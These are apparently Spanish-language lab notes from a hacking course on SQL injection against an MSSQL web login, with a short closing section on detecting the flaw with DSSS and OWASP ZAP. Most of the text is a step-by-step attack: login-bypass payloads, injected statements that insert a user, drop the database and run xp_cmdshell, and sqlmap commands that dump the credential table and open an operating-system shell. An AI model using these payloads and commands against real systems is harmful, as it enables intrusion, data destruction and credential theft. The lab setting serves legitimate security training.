SQL INYECTION

AUTHENTICATION BYPASS

REALIZAR UN ATAQUE DE INYECCIÓN SQL EN UNA BASE DE DATOS MSSQL
1. Abrimos cualquier navegador y ponemos la direccion que nos den
2. En el campo nombre de usuario, escriba la consulta blah’ o 1=1 — como nombre de inicio de sesión y deje vacío el campo campo de contraseña vacío. Haga clic en el botón Iniciar sesión
blah' or 1=1 --
3. Volvemos a la pagina y ponemos el siguiente comando para añadir un nuevo usuario con la contraseña y deje vacío el campo campo de contraseña vacío. Haga clic en el botón Iniciar sesión
blah';insert into login values ('john','apple123'); --
4. Para borrar la tabla anterior ponemos el siguiente comando y deje vacío el campo Contraseña y haga clic en Iniciar sesión
blah'; DROP DATABASE mydatabase; --
blah';exec master..xp_cmdshell 'ping www.paginaweb.com -l 65000 -t'; --
-l : es el tamaño del buffer enviado
-t : se refiere a hacer ping al host específico
 
Realizar un ataque de inyeción SQL a traves de la URL
http://localhost:8080/ASI./?p=1
REALIZAR UN ATAQUE DE INYECCIÓN SQL CONTRA MSSQL PARA EXTRAER BASES DE DATOS UTILIZANDO SQLMAP
1. Abrir navegador Firefox y ponemos la pagina
2. Iniciamos sesion con las credenciales . Una vez que haya iniciado sesión en el sitio web pulsamos boton secundario en la parte superior o en cualquiera parte de la pagina y seleccionamos Inspect Element (Q).
3. Guardamos el link de la pagina porque lo utilizaremos mas adelante «http://www.pagina.com/perfil.aspx?id=1»
4. En la parte inferior de la ventana del navegador aparece el marco Herramientas de desarrollo. Haga clic en la pestaña Consola, escriba document.cookie en la esquina inferior izquierda del navegador
document.cookie 
5. Seleccione el valor de la cookie, haga clic con el botón derecho y cópielo «mscope=1jWydNf8wro=; ui-tabs-1=0»
6. Abrimos un terminal y escribimos el siguiente comando
sudo su
sqlmap -u "http://www.pagina.com/perfil.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0" --dbs
-u: especifica la URL de destino
–cookie: especifica el valor de la cabecera HTTP cookie
–dbs: enumera las bases de datos DBMS

 

Sqlmap recupera las bases de datos presentes en el servidor MSSQL. También muestra información sobre el SO del servidor web, la tecnología de la aplicación web y el SGBD backend

6. Marcamos Yes y pulsamos Enter
7. Elegimos la base de datos y utilizamos sqlmap para recuperar las tablas de la base de datos
sqlmap -u "http://www.pagina.com/perfil.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0" -D pagina --tables
-D: especifica la base de datos DBMS a enumerar
–tables: enumera las tablas de la base de datos DBMS
8. Recuperar el contenido de la tabla de la columna User_Login. Sqlmap recupera los datos completos de la tabla User_Login de la base de datos moviescope, que contiene todos los nombres de usuario de los usuarios en la columna Uname y las contraseñas en la columna password
sqlmap -u "http://www.pagina.com/perfil.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0" -D pagina -T User_Login --dump
9. Podemos iniciar sesion con las credenciales que nos han dado
10. Para ejecutar una Shell interactiva con el sistema operativo
sqlmap -u "http://www.pagina.com/perfil.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0" --os-shell
11. Marcamos Yes y Enter
12. Para ver el nombre de la maquina donde se esta ejecutando
hostname
Y
13. Ver una lista de las tareas que se están ejecutando actualmente en el sistema de destino
TASKLIST
Y
14. Podemos utilizar otros comandos para obtener información más detallada sobre la máquina de destino
help
DETECCIÓN DE VULNERABILIDADES DE INYECCIÓN SQL MEDIANTE DSSS
1. Abrir el terminal de Parrot y dirigirse a la carpeta DSSS
sudo su
cd DSSS
2. Listar las opciones disponibles
python3 dsss.py
3. Abrir el navegador Firefox, ir a la pagina que nos proporcionen e introducimos las credenciales
4. Una vez que haya iniciado sesión en el sitio web nos dirigirse a View Perfil (el enalce de esta pagina es la que se utilizara para especificar la URL),  hacer clic en botón secundario y dirigirse a Inspeccionar elemento (Q)
5. En la parte inferior de la ventana del navegador aparece el recuadro Herramientas de desarrollo.
6. Abrir la pestaña de Console > document.cookie y copiar el valor de la cookie
7. Abrir Terminal
python3 dsss.py -u "Direccion completa de la web donde introducimos cogimos el valor de la cookie" --cookie="[Valor de la cookie]"
8. Aparece el resultado, que muestra que el sitio web de destino es vulnerable a ataques de inyección SQL ciega. También aparece el enlace vulnerable.
9. Copiar el enlace y pegarlo en el buscador, mostrar la lista completa de los usuarios
DETECCIÓN DE VULNERABILIDADES DE INYECCIÓN SQL MEDIANTE OWASP ZAP
1. Abrimos ZAP 2.11.1.
2. Marcamos No y damos a Start.
3. Vamos a la opcion Automated Scan y ponemos la direccion que nos proporcionen y damos a Attack
4. OWASP ZAP comienza a realizar el Escaneo Activo en el sitio web objetivo
5. Ir a la pestaña de Alerts para ver los resultados.
6. Expandimos la pestaña de SQL Injection y nos muestra si la URL es vulnerable